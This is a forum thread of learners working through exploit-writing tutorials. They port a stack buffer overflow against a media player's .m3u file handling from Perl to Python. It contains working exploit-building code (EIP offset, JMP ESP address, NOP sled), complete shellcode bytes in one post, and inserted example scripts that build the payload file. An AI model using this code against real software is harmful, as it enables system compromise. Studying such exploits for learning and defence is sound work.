June 21, 2011
I've been reading through the exploit writing tutorials here for a bit, and I've run into an issue that I was wondering if someone could help me with. I've been following along writing in python rather than perl, so I've been translating the code as I go. It was working out perfectly fine until I reached one spot. I've come to the point where I have an address in memory to overwrite EIP with to give the program a JMP esp command, but the program does not appear to be overwriting EIP with the correct address. I know I am writing to the correct location, because if I replace the memory address with 'BBBB', EIP is overwritten with '42424242' (when they are the only B's in the file).
I investigated to see if I was using the struct.pack() method in python in a way that it functioned differently from perl's pack() function. As far as I can tell, I'm using it right. I equated "pack('V', 0x<address>)" to "struct.pack('<L', 0x<address>)". If I am not mistaken, these two should yield the same results, as 'V' and '<L' stand for little-endian unsigned long in their respective languages.
As a few final pieces of information on my problem, I am trying to use the address '01a8f23a' and EIP ends up overwritten with '000FFD4E'. When I run the program, it does indeed crash, but it does not execute the shellcode, presumably because of the wrong data being in EIP.
EDIT: Shortly after posting this, I realized that the value stored in EIP was just a little bit larger than the address of ESP, so I added 25 NOPs to the beginning of my shellcode and it worked fine. Sorry for the trouble.
My full code:
import struct

Fuzzed = open('C:\\Documents and Settings\\Owner\\Desktop\\Fuzzed.m3u', 'w')
Fuzzed.write('A' * 26072)
string = struct.pack('<L', 0x01a8f23a)
shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"  # the post is cut off here; the remaining bytes are not reproduced on the page
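As an added example (not part of the original post), here is the buffer layout the question describes, built in Python: struct.pack('<L', addr) yields the same little-endian bytes as Perl's pack('V', addr), and the NOP sled sits between the return address and the shellcode so that execution landing slightly before the payload slides into it. The offset 26072 and the address 0x01a8f23a are the values quoted in the post; the eight INT3 bytes are a constructed stand-in for the real shellcode.

```python
import struct

# Values quoted in the post. The shellcode is a constructed stand-in
# (INT3 breakpoints), not the thread's calc shellcode.
EIP_OFFSET = 26072
JMP_ESP = 0x01a8f23a
SHELLCODE = b"\xcc" * 8


def pack_addr(addr):
    """Little-endian unsigned 32-bit: the Python equivalent of Perl's pack('V', addr).

    0x01a8f23a becomes the bytes 3a f2 a8 01, which is what the debugger
    reads back as EIP = 01a8f23a.
    """
    return struct.pack("<L", addr)


def build_m3u(offset=EIP_OFFSET, ret=JMP_ESP, nops=25, shellcode=SHELLCODE):
    """Junk up to EIP, the JMP ESP address, a NOP sled, then the shellcode.

    The sled absorbs the gap the post ran into: ESP pointed a little
    before the shellcode, so the CPU has to slide through 0x90 bytes
    before it reaches the payload.
    """
    return b"A" * offset + pack_addr(ret) + b"\x90" * nops + shellcode


def check_layout(buf, offset=EIP_OFFSET):
    """Return (raw bytes at the overwrite offset, the value EIP would hold).

    A quick self-check before launching the target: if the four bytes at
    `offset` do not decode back to the chosen address, the buffer is
    misaligned and EIP will hold garbage.
    """
    eip = buf[offset:offset + 4]
    return eip, struct.unpack("<L", eip)[0]


if __name__ == "__main__":
    payload = build_m3u()
    raw, value = check_layout(payload)
    print("bytes at EIP offset:", raw.hex())
    print("EIP would read: %08x" % value)
    with open("Fuzzed.m3u", "wb") as f:  # binary mode: no newline or encoding rewrites
        f.write(payload)
```

Run the script and compare the printed value with what the debugger shows in EIP after the crash; a mismatch means the bytes never reached the saved return address intact.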
April 17, 2012
Can anyone expand a bit on how to accomplish the same in Python 3.x (3.2)? I'm having difficulty sending the EIP address in '\x41\x41\x41\x41' format. I have done a bit of search and found something regarding encoding differently. Is there a way to still send the EIP address correctly in Python 3?
July 17, 2012
@burnfile I get the error "EOL while scanning string literal", and if I use """ for storing the shellcode in a variable, the program executes without any error but the calculator doesn't spawn. This must be because it stores the string as we provide it, including the return character "\n".
shellcode = """\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1  # the post is cut off here; the remaining lines are not reproduced on the page
I tried earlier with all the shellcode in just one line and it worked well, but if the shellcode is too long it is not possible to fit it all in one line, so can you please help me with this stupid problem?
This is the code which worked:
shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
The shellcode string is all on one line.
In Python, you can put shellcode on multiple lines by wrapping it inside round brackets:
shellcode = ("\x01\x02\x03\x04"
             # ...one string literal per line; Python joins adjacent literals...
             )
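To answer the Python 3 question above and extend the round-brackets trick, here is an added example (not from the thread) showing the two Python 3 pitfalls: a str literal such as "\xdb" is re-encoded as UTF-8 (two bytes) when written, and str cannot be concatenated with the bytes that struct.pack returns, so shellcode must be a bytes literal (b"..."), one chunk per line inside parentheses, and the file must be opened with mode "wb". The shellcode chunks here are a short constructed stand-in, not the calc shellcode from the thread.

```python
import struct

# Constructed stand-in bytes (not the thread's calc shellcode). Adjacent
# bytes literals inside parentheses are joined at compile time, so the
# payload can span as many lines as needed without embedding newlines.
SHELLCODE = (
    b"\xdb\xc0\x31\xc9"
    b"\xbf\x7c\x16\x70"
    b"\xcc\xd9\x74\x24"
)


def utf8_expansion(byte_value):
    """Number of bytes a one-character str becomes under Python 3's default
    UTF-8 encoding. Anything above 0x7f becomes two bytes, which is why a
    str-typed shellcode silently changes length and content on write."""
    return len(chr(byte_value).encode("utf-8"))


def str_to_raw_bytes(s):
    """Map a str built from \\xNN escapes back to raw bytes 1:1.

    latin-1 is the identity for code points 0x00..0xff, so this recovers
    the intended bytes when shellcode arrived as str (e.g. from a Python 2
    script) instead of a b"" literal.
    """
    return s.encode("latin-1")


def mixing_str_and_bytes_fails():
    """Python 3 refuses to concatenate str padding with packed bytes; the
    whole buffer has to be bytes from the start."""
    try:
        "A" * 4 + struct.pack("<L", 0x01a8f23a)
    except TypeError:
        return True
    return False


def build_payload(offset, ret, shellcode=SHELLCODE, nops=16):
    """Every piece is bytes, so the concatenation type-checks and the
    written file is byte-for-byte what the buffer holds."""
    return b"A" * offset + struct.pack("<L", ret) + b"\x90" * nops + shellcode


if __name__ == "__main__":
    payload = build_payload(26072, 0x01a8f23a)
    with open("Fuzzed.m3u", "wb") as f:  # text mode would re-encode the bytes
        f.write(payload)
```

If the target still does not behave, compare len(payload) with the byte count of the file on disk: any difference means something was still a str and got re-encoded on the way out.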